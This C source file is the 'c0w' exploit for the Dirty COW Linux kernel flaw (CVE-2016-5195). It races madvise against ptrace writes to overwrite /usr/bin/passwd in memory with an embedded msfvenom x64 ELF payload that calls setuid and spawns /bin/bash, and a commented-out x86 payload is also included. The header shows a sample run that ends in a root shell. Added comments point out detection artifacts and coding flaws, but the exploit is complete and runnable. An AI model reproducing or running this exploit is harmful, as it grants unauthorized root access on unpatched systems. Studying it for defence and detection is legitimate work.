cow.c
  1. /*
  2. * A PTRACE_POKEDATA variant of CVE-2016-5195
  3. * should work on RHEL 5 & 6
  4. *
  5. * (un)comment correct payload (x86 or x64)!
  6. * $ gcc -pthread c0w.c -o c0w
  7. * $ ./c0w
  8. * DirtyCow root privilege escalation
  9. * Backing up /usr/bin/passwd.. to /tmp/bak
  10. * mmap fa65a000
  11. * madvise 0
  12. * ptrace 0
  13. * $ /usr/bin/passwd
  14. * [root@server foo]# whoami
  15. * root
  16. * [root@server foo]# id
  17. * uid=0(root) gid=501(foo) groups=501(foo)
  18. * @KrE80r
  19. */
  20. #include <fcntl.h>
  21. #include <pthread.h>
  22. #include <string.h>
  23. #include <stdio.h>
  24. #include <stdint.h>
  25. #include <sys/mman.h>
  26. #include <sys/stat.h>
  27. #include <sys/types.h>
  28. #include <sys/wait.h>
  29. #include <sys/ptrace.h>
  30. #include <unistd.h>
  31.  
/* Process-wide state shared between main() and madviseThread(). */
int f;            // descriptor of suid_binary, opened O_RDONLY in main()
void *map;        // PROT_READ, MAP_PRIVATE mapping of that file; madviseThread reads this global
pid_t pid;        // fork() result: child pid in the parent, 0 in the child
pthread_t pth;    // the child's madvise thread
struct stat st;   // fstat() of f; st_size sizes the mapping

// change if no permissions to read
// NOTE(review): the file only needs to be readable by the caller — it is opened O_RDONLY and mapped PROT_READ.
char suid_binary[] = "/usr/bin/passwd";
  40.  
  41. /*
  42. * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  43. */
/*
 * 177-byte ELF image produced by the msfvenom command above (14 rows of 12
 * bytes plus 9); sc_len below must equal this count. The plaintext strings
 * "/bin/sh", "-c" and "/bin/bash" are visible in the trailing rows, which is
 * what a file or memory scanner would key on.
 */
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;   // byte count of shell_code; drives the ptrace loop bounds in main()
  62.  
  63. /*
  64. * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  65. unsigned char shell_code[] = {
  66. 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  67. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  68. 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  69. 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  70. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  71. 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  72. 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  73. 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  74. 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  75. 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  76. 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  77. 0x89, 0xe1, 0xcd, 0x80
  78. };
  79. unsigned int sc_len = 136;
  80. */
  81.  
/*
 * Child-side thread: calls madvise(MADV_DONTNEED) on the first 100 bytes of
 * the private mapping 200,000,000 times, so those pages are continually
 * dropped and re-faulted while the parent pokes the same addresses via
 * ptrace. This is one half of the CVE-2016-5195 (Dirty COW) race; on a
 * kernel carrying the fix the loop has no effect beyond CPU time, which is
 * also the most visible runtime symptom of this program. `c` sums the
 * madvise() return values (0 on success, -1 on error) and is printed when
 * the loop ends. `arg` is unused, and the function has no return
 * statement, so the value delivered to pthread_join is indeterminate.
 */
void *madviseThread(void *arg) {
    int i, c = 0;
    for (i = 0; i < 200000000; i++)
        c += madvise(map, 100, MADV_DONTNEED);
    printf("madvise %d\n\n", c);
}
  88.  
  89.  
/*
 * Entry point. Copies suid_binary to /tmp/bak through system("cp ..."),
 * maps the file read-only and private, then forks: the child makes itself
 * traceable (PTRACE_TRACEME), stops itself with SIGSTOP and runs
 * madviseThread; the parent waits for that stop and repeatedly writes
 * shell_code into the mapping with PTRACE_POKETEXT. No result is checked —
 * open(), fstat(), mmap(), fork(), asprintf(), system() and ptrace()
 * return values are ignored or merely summed into a counter. Artifacts a
 * defender can key on: a copy of the binary at /tmp/bak, a process that
 * ptraces its own child, and the child's sustained madvise() call rate.
 * argc and argv are unused.
 */
int main(int argc, char *argv[]) {

    printf(" \n\
(___) \n\
(o o)_____/ \n\
@@ ` \\ \n\
\\ ____, /%s \n\
// // \n\
^^ ^^ \n\
", suid_binary);
    char *backup;
    printf("DirtyCow root privilege escalation\n");
    printf("Backing up %s to /tmp/bak\n", suid_binary);
    // Shell command built from suid_binary; asprintf's status is ignored and backup is never freed.
    asprintf(&backup, "cp %s /tmp/bak", suid_binary);
    system(backup);

    f = open(suid_binary, O_RDONLY);
    fstat(f, &st);
    // Read-only private mapping of the whole file, extended by sizeof(long);
    // presumably so the long-sized pokes near the end stay inside the mapping — not verified here.
    map = mmap(NULL, st.st_size + sizeof(long), PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %x\n\n", map);   // %x with a pointer argument: mismatched format, output is informational only
    pid = fork();
    if (pid) {
        // Parent: block until the child has SIGSTOPped itself, then poke
        // shell_code into the mapping one long at a time; the three nested
        // loops repeat each offset 10000 times, (10000/l) passes over all l
        // offsets. `c` accumulates the ptrace() return values.
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0, l = sc_len;
        for (i = 0; i < 10000 / l; i++)
            for (o = 0; o < l; o++)
                for (u = 0; u < 10000; u++)
                    c += ptrace(PTRACE_POKETEXT, pid, map + o, *((long *)(shell_code + o)));
        printf("ptrace %d\n\n", c);
    }
    else {
        // Child: start the madvise thread, then request tracing by the parent
        // and stop so the parent's waitpid() returns; the join keeps the child
        // alive for the whole madvise loop.
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth, NULL);
    }
    return 0;
}